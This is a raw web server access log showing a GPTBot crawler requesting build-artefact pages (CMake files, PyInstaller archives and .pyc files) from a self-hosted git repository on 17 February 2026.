"/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 10868] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10341] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:14:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23253] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16158] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:14:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:14:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:14:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 2814871] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:14:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:14:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:14:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10920] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10918] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10918] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:14:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:14:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16920] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:15:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 2815235] [Gzip 25.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:15:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11044] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14307] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73545] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21804] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23983] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 26768] [Gzip 20.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:15:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10753] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:15:00:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:15:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:15:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:15:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60204] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10376] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 